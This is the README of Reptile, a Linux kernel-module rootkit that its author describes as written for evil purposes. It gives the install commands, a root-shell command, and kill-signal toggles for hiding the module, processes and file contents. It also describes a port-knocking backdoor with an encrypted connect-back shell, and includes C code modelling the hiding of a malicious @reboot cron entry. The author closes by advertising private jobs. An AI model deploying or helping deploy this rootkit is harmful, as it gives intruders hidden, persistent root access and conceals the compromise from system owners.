Reptile is an LKM rootkit written for evil purposes that runs on Linux kernel 2.6.x/3.x/4.x.
- Give root to unprivileged users
- Hide files and directories
- Hide file contents
- Hide processes
- Hide itself
- Hidden boot persistence
- String obfuscation (method suggested by milabs)
- ICMP/UDP/TCP port-knocking backdoor
- Full TTY/PTY shell with file transfer
- Client to handle Reptile Shell
- Shell connects back at a configurable interval (disabled by default)
Install the headers for the running kernel, fetch the source and run the installer:
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install
To uninstall: ./setup.sh remove
Binaries are copied to the /reptile folder (or whatever name you chose during setup), which Reptile hides.
To get a root shell, just run: /reptile/reptile_r00t
The following toggles are sent as signal numbers that Reptile's hooked kill() intercepts; for the module and file-content toggles the PID argument (0) is only a placeholder.
- Hide/unhide the Reptile module:
kill -50 0
- Hide/unhide a process:
kill -49 <PID>
- Hide/unhide file contents:
kill -51 0
While content hiding is on, everything between the tags is hidden from the file. Example:
#<reptile>
content to hide
#</reptile>
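The tag rule above, as an added example that is not Reptile's own code: a user-space C model of the content filter the rootkit applies at read time once kill -51 0 has turned hiding on. The two tag strings come from the README; the function names, the treatment of an unterminated or stray tag, and the constructed crontab sample are assumptions made for this example.

```c
/* Added example, not Reptile's own code: user-space model of Reptile's
 * file-content hiding.  In the kernel the rootkit filters data as it is
 * read; this function applies the same rule to an in-memory buffer.
 * The tag strings are the ones given in the README; function names and
 * the sample input are assumptions made for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HIDE_OPEN  "#<reptile>"
#define HIDE_CLOSE "#</reptile>"

/* 1 if `line` (len bytes, no trailing '\n') is exactly `tag`, ignoring
 * trailing spaces, tabs and a CR so CRLF files work too. */
static int line_is_tag(const char *line, size_t len, const char *tag)
{
    size_t tlen = strlen(tag);
    while (len > 0 && (line[len - 1] == ' ' || line[len - 1] == '\t' ||
                       line[len - 1] == '\r'))
        len--;
    return len == tlen && memcmp(line, tag, tlen) == 0;
}

/* Copy `in` (n bytes) into a newly malloc'd *out, dropping every line from
 * an open tag through the matching close tag, tags included.  Returns the
 * number of bytes written (*out is NUL-terminated; caller frees it).
 * An open tag that is never closed hides everything to end of input. */
size_t reptile_filter(const char *in, size_t n, char **out)
{
    char *buf = malloc(n + 1);
    size_t pos = 0, w = 0;
    int hiding = 0;

    if (!buf) {
        *out = NULL;
        return 0;
    }
    while (pos < n) {
        const char *line = in + pos;
        const char *nl = memchr(line, '\n', n - pos);
        size_t linelen = nl ? (size_t)(nl - line) : n - pos;
        size_t span = linelen + (nl ? 1 : 0);   /* bytes consumed incl. '\n' */

        if (!hiding && line_is_tag(line, linelen, HIDE_OPEN))
            hiding = 1;                          /* start of hidden block */
        else if (hiding && line_is_tag(line, linelen, HIDE_CLOSE))
            hiding = 0;                          /* end of hidden block */
        else if (!hiding) {
            memcpy(buf + w, line, span);         /* visible line: pass through */
            w += span;
        }
        pos += span;
    }
    buf[w] = '\0';
    *out = buf;
    return w;
}

/* Check helper: 1 if filtering `in` yields exactly `expected`. */
int filter_matches(const char *in, const char *expected)
{
    char *out;
    size_t n = reptile_filter(in, strlen(in), &out);
    int ok = out != NULL && n == strlen(expected) && memcmp(out, expected, n) == 0;
    free(out);
    return ok;
}

int main(void)
{
    /* Constructed sample of a crontab with a tagged block (example only). */
    const char *sample =
        "PATH=/usr/bin:/bin\n"
        "0 3 * * * /usr/local/bin/backup.sh\n"
        "#<reptile>\n"
        "@reboot /tmp/.hidden/run\n"
        "#</reptile>\n"
        "30 4 * * 0 /usr/local/bin/rotate-logs.sh\n";
    char *clean;
    size_t len = reptile_filter(sample, strlen(sample), &clean);

    fwrite(clean, 1, len, stdout);   /* the @reboot line is gone */
    free(clean);
    return 0;
}
```

Compile with cc and run: the @reboot line inside the tags does not appear in the output, while the real cron entries around it are unchanged. In this model a tag is only recognised when it occupies a whole line, and a close tag with no preceding open tag is passed through as an ordinary line.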
Configure and compile the client: ./setup.sh client
Use the client to send the magic packets (the port-knocking backdoor) and get your full encrypted TTY shell.
More information: Reptile Shell
Some functions of this module are based on other rootkits; please see the references.
- “LKM HACKING”, The Hackers Choice (THC), 1999;
- https://github.com/mncoppola/suterusu
- https://github.com/m0nad/Diamorphine.git
- https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git
- https://github.com/maK-/maK_it-Linux-Rootkit
- “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997;
- https://ruinedsec.wordpress.com/2013/04/04/modifying-system-calls-dispatching-linux/
- https://github.com/creaktive/tsh
- http://www.drkns.net/kernel-who-does-magic/
I do private jobs; if you are interested, send me an e-mail at: [email protected]